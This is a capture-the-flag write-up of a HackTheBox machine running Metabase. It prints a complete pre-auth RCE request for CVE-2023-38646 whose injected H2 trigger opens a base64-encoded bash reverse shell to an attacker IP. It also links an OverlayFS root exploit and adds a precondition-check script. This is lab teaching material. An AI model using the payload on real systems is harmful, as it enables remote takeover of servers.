Analytics

Personal Rating: Medium

Initial Enumeration

I started a full nmap scan and a vhost scan in the background.

sudo nmap -oA nmap-analytics -p- -A 10.10.11.233

ffuf -u http://10.10.11.233/ -H 'Host: FUZZ.analytical.htb' -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt -mc 200 -t 64

  • There is a webserver on port 80 -> analytical.htb

  • A login page references data.analytical.htb

According to Wappalyzer, the stack includes Leaflet, React, Emotion, nginx, PWA, webpack, D3, HSTS, Ace and Lodash.

The login page on data.analytical.htb is a Metabase instance. HackTricks has nothing on it, so I poked around by myself for a while. The only public exploit for it I could find is CVE-2023-38646, a pre-auth RCE.

Metabase RCE

This write-up of the vulnerability looked promising: https://infosecwriteups.com/cve-2023-38646-metabase-pre-auth-rce-866220684396

I could identify the setup token as 249fa03d-fd94-4d5b-b94f-b4ebf3df681f

The Assetnote advisory shows the request required for exploitation:

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Following it, after getting the token and base64-encoding the reverse shell command, I got a reverse shell with this request:

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type: application/json
Cookie: metabase.DEVICE=ffe6f429-df53-4116-a173-9a822cdadb60
Content-Length: 818

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjQvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

Internal Enum & Persistence

In the reverse shell, most commands return "command not found".

I found a database file at /metabase.db/metabase.db.mv.db; the .mv.db extension marks it as an H2 database, the embedded application database Metabase uses by default, according to https://www.metabase.com/docs/latest/installation-and-operation/configuring-application-database

LinEnum gave me this:

This did allow for SSH login.

It looks like we are inside an Alpine Docker container, which explains the missing commands. Checking which useful binaries are present:

which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

Only a handful exist:

/usr/bin/nc
/usr/bin/wget
/usr/bin/curl
/bin/ping
/bin/base64

Running LinPEAS:

is modprobe present ............ lrwxrwxrwx 1 root root 12 Jun 14 15:03 /sbin/modprobe -> /bin/busybox

Privesc

After running LinPEAS and googling for a while, I found this post: https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

CVE-2023-2640 and CVE-2023-32629 are the Ubuntu-specific OverlayFS bugs (GameOver(lay)), so the target is the Ubuntu host reached over SSH, not the Alpine container. After some more googling I found this PoC, which worked to get a root shell: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh
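Before firing a kernel PoC it is worth confirming the conditions it depends on. The added script below (not part of the write-up or of the linked PoC) checks the preconditions the OverlayFS exploit relies on: an Ubuntu userland, unprivileged user namespaces enabled, and the overlay filesystem loaded. It assumes the default Ubuntu locations for os-release, the userns sysctl and /proc/filesystems; each function takes an optional path so it can be run against a constructed file.

```sh
#!/bin/sh
# Precondition check for the Ubuntu OverlayFS privesc (CVE-2023-2640 /
# CVE-2023-32629) linked above. Added example for this write-up, not part
# of the original post or of the linked PoC. Assumptions: default Ubuntu
# paths for os-release, the userns sysctl and /proc/filesystems; each
# function accepts an optional path so it can be checked offline.

is_ubuntu() {
    # $1: os-release file (default /etc/os-release); the bug is Ubuntu-specific
    grep -q '^ID=ubuntu' "${1:-/etc/os-release}"
}

userns_enabled() {
    # $1: the Debian/Ubuntu sysctl gating unprivileged user namespaces.
    # The PoC builds its overlay mount inside `unshare -rm`, which needs this on.
    f="${1:-/proc/sys/kernel/unprivileged_userns_clone}"
    [ -f "$f" ] || return 0   # no such knob on this kernel: userns is allowed
    [ "$(cat "$f")" = "1" ]
}

overlay_available() {
    # $1: /proc/filesystems; the vulnerable code is the overlay driver itself
    grep -q 'overlay$' "${1:-/proc/filesystems}"
}

can_unshare() {
    # Live check: can this user actually create a user + mount namespace?
    unshare -rm true 2>/dev/null
}

report() {
    printf 'distro ubuntu:      %s\n' "$(is_ubuntu && echo yes || echo no)"
    printf 'kernel:             %s\n' "$(uname -r)"
    printf 'userns sysctl on:   %s\n' "$(userns_enabled && echo yes || echo no)"
    printf 'overlay loaded:     %s\n' "$(overlay_available && echo yes || echo no)"
    printf 'unshare -rm works:  %s\n' "$(can_unshare && echo yes || echo no)"
}

if [ "${1:-}" = "--report" ]; then
    report
fi
```

Run it with --report over the SSH session. All "yes" makes the PoC plausible but does not prove the kernel is unpatched: the fixed Ubuntu kernels show the same answers, so the uname -r output still has to be compared against the Ubuntu security notice for these two CVEs.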
